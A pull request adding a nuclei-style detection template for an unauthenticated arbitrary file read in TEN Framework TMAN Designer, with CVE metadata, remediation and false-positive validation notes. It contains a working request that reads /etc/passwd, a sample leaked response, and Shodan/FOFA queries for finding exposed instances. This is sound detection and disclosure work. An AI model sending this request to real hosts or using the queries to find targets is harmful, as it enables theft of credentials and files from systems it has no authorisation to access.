### PR TITLE
Add CVE-2026-85688 - TEN Framework TMAN Designer <= 0.11.71 - Arbitrary File Read

### DIFF
--- a/http/cves/2026/CVE-2026-85688.yaml
+++ b/http/cves/2026/CVE-2026-85688.yaml
@@ -1,0 +1,62 @@
+id: CVE-2026-85688
+
+info:
+  name: TEN Framework TMAN Designer <= 0.11.71 - Arbitrary File Read
+  author: aryu-ru,geo-chen
+  severity: critical
+  description: |
+    TEN Framework 0.10.1 through 0.11.71 ships the TMAN Designer HTTP API with no authentication of any kind. The POST /api/designer/v1/file-content endpoint hands the caller-supplied file_path straight to fs::read_to_string() with no containment or path validation, so an unauthenticated remote attacker can read any UTF-8 text file readable by the tman process and receive it in the JSON content field. The same resource also registers a PUT route that writes attacker-controlled content to an arbitrary path.
+  impact: |
+    Unauthenticated attackers can read arbitrary files from the host, including SSH keys, service credentials and application configuration, leading to further compromise.
+  remediation: |
+    No fixed release is available as of 0.11.71. Bind the designer to loopback with `tman designer --ip 127.0.0.1` instead of the default 0.0.0.0, and restrict network access to the designer port (49483 by default). Loopback binding alone is not sufficient, because every route is wrapped in an any-origin CORS policy that reflects the request Origin, so run the designer only on trusted workstations and place it behind an authenticating reverse proxy.
+  reference:
+    - https://www.vulncheck.com/advisories/ten-framework-0.11.71-unauthenticated-file-read-write-via-tman-designer
+    - https://github.com/TEN-framework/ten-framework/issues/2187
+    - https://github.com/TEN-framework/ten-framework/blob/0.11.71/core/src/ten_manager/src/designer/file_content/mod.rs
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-85688
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2026-85688
+    cwe-id: CWE-306
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: ten-framework
+    product: ten-framework
+    shodan-query: http.title:"TEN Manager"
+    fofa-query: title="TEN Manager"
+  tags: cve,cve2026,ten-framework,tman,lfi,ai,unauth
+
+http:
+  - raw:
+      - |
+        POST /api/designer/v1/file-content HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"file_path":"/etc/passwd"}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: header
+        words:
+          - "application/json"
+
+      - type: word
+        part: body
+        words:
+          - '"status":"ok"'
+          - '"data":{"content":"'
+        condition: and
+
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0:"
+
+      - type: status
+        status:
+          - 200


### PR DESCRIPTION
### PR Information

- Added CVE-2026-85688: TEN Framework TMAN Designer <= 0.11.71 - Arbitrary File Read

`tman designer` binds `0.0.0.0:49483` by default and its actix `App` wraps only `actix_cors`, so there is no authentication. `POST /api/designer/v1/file-content` passes the caller-supplied `file_path` straight to `fs::read_to_string()` with no validation and returns the file in the JSON `content` field. The same resource registers a `PUT` route that writes to an arbitrary path. The template exercises the read route only and changes nothing on the target.

Introduced in 0.10.1, present at 0.11.71 (the latest release) and still on `main`, so there is no fixed version and `remediation` gives the binding mitigation instead.

Vulnerability found and reported by George Chen (`geo-chen`) in issue #2187, credited in `author`.

- References:
  - https://www.vulncheck.com/advisories/ten-framework-0.11.71-unauthenticated-file-read-write-via-tman-designer
  - https://github.com/TEN-framework/ten-framework/issues/2187
  - https://github.com/TEN-framework/ten-framework/blob/0.11.71/core/src/ten_manager/src/designer/file_content/mod.rs
  - https://nvd.nist.gov/vuln/detail/CVE-2026-85688

### Template validation

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [x] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details

Lab: `tman-linux-release-x64.zip` from the 0.11.71 release, then `./ten_manager/bin/tman designer --port 49483`. No Docker, database or credentials needed.

```
POST /api/designer/v1/file-content HTTP/1.1
Host: 127.0.0.1:49483
Content-Type: application/json

{"file_path":"/etc/passwd"}
```

```
HTTP/1.1 200 OK
Content-Length: 3504
Content-Type: application/json

{"status":"ok","data":{"content":"root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n ... "}}
```

```
[CVE-2026-85688] [http] [critical] http://127.0.0.1:49483/api/designer/v1/file-content
```

Also matches the 0.11.66 binary. Since no patched release exists, false positives were checked against eight non-vulnerable hosts, all returning `No results found`: a reflecting echo host that emits both `"status":"ok"` and a `content` key, a TEN-shaped envelope with benign content, a host leaking real `/etc/passwd` as `text/plain`, a generic `{"status":"ok","data":null}` API, `nginx:alpine`, an advisory page quoting this PoC served as `text/html` and again as `text/plain`, and `http://honey.scanme.sh`.

The `application/json` header matcher and the exact `"data":{"content":"` envelope word are what keep those advisory pages from matching. Looser body words alone match prose that merely quotes the PoC.

`nuclei -validate` and `yamllint -c .yamllint` both pass. No existing TEN Framework coverage: `grep -ril` for the CVE id, `ten-framework`, `ten_manager`, `designer/v1` and `TEN Manager` across `http/`, `network/`, `javascript/`, `dns/`, `ssl/`, `code/` and `cves.json` returns nothing.
